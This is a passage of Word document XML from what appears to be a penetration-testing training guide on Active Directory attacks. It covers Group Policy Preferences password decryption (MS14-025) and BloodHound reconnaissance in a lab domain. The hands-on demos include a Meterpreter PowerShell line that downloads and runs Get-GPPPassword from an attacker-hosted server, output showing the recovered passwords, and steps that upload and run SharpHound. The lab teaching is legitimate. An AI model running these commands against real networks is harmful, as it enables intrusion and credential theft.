        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="08619206" wp14:editId="1C37C9AB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1657350</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3258949" cy="1364492"/>
            <wp:effectExtent l="19050" t="19050" r="17780" b="266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yEqyMWEU.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8949" cy="1364492"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="bg1">
                          <a:lumMod val="65000"/>
                        </a:schemeClr>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BC10E5" w14:textId="74B76F07" w:rsidR="00032E3E" w:rsidRDefault="00032E3E" w:rsidP="00032E3E">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2B5B8D" w14:textId="77777777" w:rsidR="00032E3E" w:rsidRDefault="00032E3E" w:rsidP="00032E3E">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08D5C642" w14:textId="351069EA" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Active Directory exploitation with a lambda user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C238190" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Group policy preferences vulnerability (MS14-025)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492E170A" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>The Group policy preferences vulnerability is due to the way an Active Directory distributes passwords that are configured using Group Policy preferences. An authenticated user can easily decrypt the password that are stored in an XML file and use them to elevate privileges on the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0836B2CA" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251736064" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="368CFE2E" wp14:editId="5A000393">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>27403</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>347883</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4287520" cy="1555115"/>
            <wp:effectExtent l="19050" t="19050" r="17780" b="2603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S_static_key_group_policy.PNG"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4287520" cy="1555115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="bg1">
                          <a:lumMod val="50000"/>
                        </a:schemeClr>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>The password were encrypted using a static key (available online…).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3575AA94" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1DB645" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Two Metasploit modules exist to gather passwords using this vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E67258" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00036A45" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00036A45">
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
        </w:rPr>
        <w:t>post/windws/gather/credentials/gpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BD8EC9" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00036A45">
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>auxiliary/scanner/smb/smb_enum_gpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1B6F51" w14:textId="1D06FBED" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
          <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
          <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Another way to gather this information is to use </w:t>
      </w:r>
      <w:r w:rsidR="00032E3E">
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
          <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PowerSploit, which</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
          <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a collection of PowerShell modules that can help an attacker. One of this script, “Get-GPPPAssword” can be used to extract and decrypt password</w:t>
      </w:r>
      <w:r w:rsidR="00032E3E">
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
          <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
          <w:rFonts w:ascii="Utopia Std" w:hAnsi="Utopia Std"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> form the Group Policy Preferences files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67270088" w14:textId="1744F5B3" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B70BCA">
        <w:t>Demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4C45F5" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Let us first download Powersploit and host the scripts on our local Apache server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F24BF11" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kali:~/Desktop# git clone https://github.com/PowerShellMafia/PowerSploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC2BAB4" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Cloning into 'PowerSploit'...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8168D3" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>remote: Counting objects: 3083, done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F53E5" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>remote: Total 3083 (delta 0), reused 0 (delta 0), pack-reused 3083</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6271F3" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Receiving objects: 100% (3083/3083), 10.42 MiB | 2.33 MiB/s, done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBA5790" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Resolving deltas: 100% (1807/1807), done.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BDF273" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@kali:~/Desktop# mv PowerSploit/ /var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520AF606" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="098D32A1" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Then load the powershell module into the Meterpreter session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DBF3ED" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="0096707E">
        <w:t>meterpreter &gt; load powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79298FBB" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A7BE175" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>In a powershell session, the Module is first installed locally and then the Get-GPPPassword script is launched:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D852E55" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>meterpreter &gt; powershell_shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494F2AC6" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PS &gt; IEX(New-Object Net.WebClient).DownloadString("http://192.168.21.10/PowerSploit/Exfiltration/Get-GPPPassword.ps1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D28DB19" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PS &gt; Get-GPPPassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236A40E0" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E478F57" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A52DEC3" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>NewName   : [BLANK]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3838B6BB" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Changed   : {2014-01-09 10:50:47, 2014-07-18 13:47:42}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C7003E" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Passwords : {</w:t>
      </w:r>
      <w:r w:rsidRPr="005C341F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sql, LocalRoot!</w:t>
      </w:r>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57614255" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>UserNames : {</w:t>
      </w:r>
      <w:r w:rsidRPr="005C341F">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>DBA1, DBA2</w:t>
      </w:r>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493AA1CD" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>File      : \\HACKLAB.LU\SYSVOL\hacklab.lu\Policies\{75C007A6-96E8-4B56-8A84-46A9D919122D}\User\Preferences\DataSources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E1707" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="0096707E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            \DataSources.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A6546A" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D013D6C" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="0096707E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>That is it! The attacker successfully accessed two accounts (DBA1 and DBA2) with ‘sql’ and ‘LocalRoot!’ as passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139E4D0D" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="005B70E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFEA604" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Revealing hidden relationships within an Active Directory with BloodHound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5633CD6E" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251722752" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4D960893" wp14:editId="0FD3D801">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1313815</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3723640" cy="3229610"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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D_BloudHound_Demo.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3723640" cy="3229610"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Getting a local admin on a machine in a domain is great but how to know which machine to target secondly to increase the chance of escalating to Domain Admin? The answer lies in the Active Directory. Thanks to tools such as BloodHound and Neo4j, an attacker can find a path of machines to compromise to get Domain Admin privileges. BloodHound is composed of scripts (exe and Powershell scripts) that will “dump” Active Directory data. This data are then imported in Neo4j, which is a graph database. Below is the result of the AD data that can be gathered during a pentest:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5CD6F8" w14:textId="0896EAA1" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Once imported, Active Directory data can be visualized in BloudHound application. Some AD are very complex and this explains how difficult it can be to configure all rights correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B3DEE2" w14:textId="151742D2" w:rsidR="00815AA1" w:rsidRDefault="00815AA1" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C0293B4" w14:textId="7FF6B6A2" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B70BCA">
        <w:t>DEMO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E95248" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Using the previously opened Meterpreter session with “John Doe” user. First change the current working directory to a directory jdoe has writing rights and upload BloodHound collection scripts, available on github:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37067198" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:t>github.com/BloodHoundAD/BloodHound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D409B1B" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>meterpreter &gt; cd C:\\Users\\jdoe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028B07D8" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB8A351" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>meterpreter &gt; mkdir BloodHound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085E1699" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>Creating directory: BloodHound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C95B098" w14:textId="77777777" w:rsidR="002131E4" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>meterpreter &gt; upload –r BloudHound/Ingestors BloodHound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A475DC" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>meterpreter &gt; cd BloodHound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014A4D12" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>meterpreter &gt; execute -f SharpHound.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7B5E58" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>Process 2408 created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DF0F4B" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>meterpreter &gt; ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5A6D80" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>Listing: C:\Users\jdoe\BloodHound\Ingestors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2127A101" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>===========================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085868E7" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42BD089C" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2C6E">
        <w:rPr>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>Mode              Size    Type  Last modified              Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69002654" w14:textId="77777777" w:rsidR="002131E4" w:rsidRPr="00FC2C6E" w:rsidRDefault="002131E4" w:rsidP="002131E4">
      <w:pPr>
